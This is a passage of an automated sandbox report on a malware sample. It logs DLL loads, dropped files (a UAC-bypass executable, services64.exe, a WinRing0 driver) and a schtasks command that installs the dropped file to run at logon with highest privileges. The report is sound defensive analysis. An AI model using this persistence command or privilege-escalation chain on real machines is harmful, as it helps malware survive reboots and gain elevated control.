Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Sample is not signed and drops a device driver

Source: GcqJPBLD2Q.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: GcqJPBLD2Q.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: GcqJPBLD2Q.exe

Static file information: File size 3598848 > 1048576

Source: GcqJPBLD2Q.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x36e000

Source: GcqJPBLD2Q.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\DccwBypassUAC.pdbp^ source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmC:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\DccwBypassUAC\x64\Release\vc143.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb''$GCTL source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp, DccwBypassUAC.exe, 00000005.00000000.2143738262.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp, DccwBypassUAC.exe, 00000005.00000002.2150159219.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG:FULL /PDB:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\DccwBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.lib /MACHINE:X64 source: GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\DccwBypassUAC.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cwdC:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\DccwBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG:FULL /PDB:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\DccwBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.lib /MACHINE:X64 source: GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp, DccwBypassUAC.exe, 00000005.00000000.2143738262.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp, DccwBypassUAC.exe, 00000005.00000002.2150159219.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: DccwBypassUAC.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F00BD pushad ; iretd	0_2_00007FFD343F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD342CD2A5 pushad ; iretd	2_2_00007FFD342CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343E00BD pushad ; iretd	2_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343E84FA push ebx; ret	2_2_00007FFD343E85AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343E85AB push ebx; ret	2_2_00007FFD343E85AA
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00007FFD344A1C7A push ebx; ret	7_2_00007FFD344A1CEA

Persistence and Installation Behavior

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	File created: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	File created: C:\Users\user\AppData\Local\Temp\Cool.exe	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Local\Temp\services64.exe	Jump to dropped file

Boot Survival

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
